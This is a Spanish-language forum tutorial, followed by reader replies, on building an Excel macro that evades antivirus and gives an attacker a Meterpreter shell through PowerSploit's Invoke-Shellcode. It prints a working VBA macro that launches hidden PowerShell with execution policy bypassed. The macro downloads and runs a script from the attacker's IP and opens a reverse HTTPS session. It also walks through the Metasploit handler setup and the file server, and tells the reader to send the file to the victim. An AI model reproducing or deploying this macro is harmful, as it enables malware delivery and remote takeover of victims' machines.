PowerSploit – Atacando con Excel (Indetectable)

PowerSploit es la suite que te permitirá conseguir una Shell de la manera mas fácil posible, sin compilar ni programar nada avanzado y con la habilidad de evadir antivirus y todo eso en menos de 1 minuto...

Domingo de lluvia, resaca y votación en Argentina la humedad, el calor y las lluvias no invitan a hacer un carajo, asique me dispongo a escribir tal como me lo solicitaban en la calle, en el tren y también cuando tenía reuniones de negocio en PORTO PIRATA (Happy Hour después de las 18hs, 2 birras 70pesos Argentinos) sobre un Ataque con EXCEL indetectable por los AV comerciales

Antes que nada: Lo que voy a explicar a continuación se realizó en 2 máquinas virtuales y se utiliza a modo de aprendizaje, NO
me responsabilizo por su mal uso.

Aclarado el punto que no me hago cargo si hacen cagadas, empecemos por la presentación, PowerSploit es una colección de módulos de Microsoft Powershell, que pueden ser utilizados por los pentesters durante toda la fase del mismo.
Si no me creen aca les paso lo que dice el autor: "PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts" – MATT GRAEBER (mattifestation)

Bueno dejemos los Buenos modales de lado y comencemos con la acción!

Matt utiliza GITHUB para subir sus proyectos, acá el link, aunque un modo más copado de descargar todo es hacer un "clone" de esos archivos y se hace muy fácil y de la siguiente manera:

1- Creamos una Carpeta por ejemplo que se llame "PowerSploit" ojo la llamo así para ser un poco más prolijo, vos llama como se te cante , este paso es simple, botón derecho "NEW FOLDER"

2- Abrimos la consola y ejecutamos "git clone No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"


3- Nos vamos a la carpeta que se acaba de descargar y entramos a la que se llama "CodeExcution" y copiamos al HOME el archivo que se llama "Invoke–Shellcode.ps1" <= Hey abombado presta atención que hay 2 archivos con el mismo nombre pero hay uno con solo " – " 1 guion medio, vos necesitas el que tiene 2.


4- Abrimos la Consola de Metasploit , ejecutamos el multi handler y configuramos con la IP del atacante, usamos ExitOnSession luego que se nos cierra el puerto de la víctima continua abierto y exploit –j para correr en background, algo así:


5- Eso no tocamos más... ahora es tiempo de copiar la macro en un Excel y enviar a la maquina te virtual VICTIMA, amigo no te olvides de cambiar las ip, te las marco en ROJO por las dudas.

Public Function Execute() As Variant
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.116.131/Invoke–Shellcode.ps1′)); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.116.131
-Lport 4444 -Force", Null, objConfig, intProcessID
End Function

6- Abrimos otra Shell y buscamos el archivo "Invoke- – Shellcode.ps1" y le damos permiso de ejecución de la siguiente manera:


7- Luego ejecutamos "Python –m SimpleHTTPServer 80"


8- Abrimos el EXCEL en la maquina VICTIMA (ósea, doble click en el archivo Excel, no te voy a mostrar esa bobada)

9- En la consola que ejecutamos el SImpleHTTPServer vamos a ver algo así...


Y en la consola de Metasploit vamos a tener algo así:


Ya tendríamos un sesión de Meterpreter activa!!


EXPLICACIÓN

Primero abrimos una "mini" página WEB desde el KALI – Cual es la dirección de la página web? Básicamente la ip que pusimos – (por si aun no te distes cuenta lo hicimos con el comando (Python –m SimpleHTTPServer) y en nuestra mini WEB tenemos el archivo de PowerShell, si no te distes cuenta es el archivo que termina con ".PS1" Por ese lado ya estaríamos, tenemos una MINIWEB con un archivo de Powershell hasta ahí todo bien?? Bueno espero que sí, y lo que tenemos en Metasploit es el comando que escucha el llamado del POWERSHELL ese que está en la mini web, y finalmente lo que hace la Macro del Excel es ejecutar el Powershell que tenemos en la Miniweb (cuantas veces puse MINIWEB y POWERSHELL??) y Metasploit toma la llamada del Meterpreter y listooooooo! Adentro!!

Autor: Matías

No se si actualizaron o ke pero solo aparece un invoke powershell.ps1 que es "Invoke-Powershell.ps1" con un solo '-'. Es el mismo proceso?. En excel el macro va con un Auto_Open en el nombre del macro no?

Tengo el mismo problema que @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, solo me sale el que tiene un "-" guion medio. ademas cuando pongo en la consola de metasploit

set Exi

me marca el siguiente error:

Unknown variable
Usage: set [option] [value]

Set the given option to value.  If value is omitted, print the current value.
If both are omitted, print options that are currently set.

If run from a module context, this will set the value in the module's
datastore.  Use -g to operate on the global datastore

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, muy probablemente este desfasado.

Buenas como se mete la macro en Excel?
A mi me da error


Enviado desde mi iPhone utilizando Tapatalk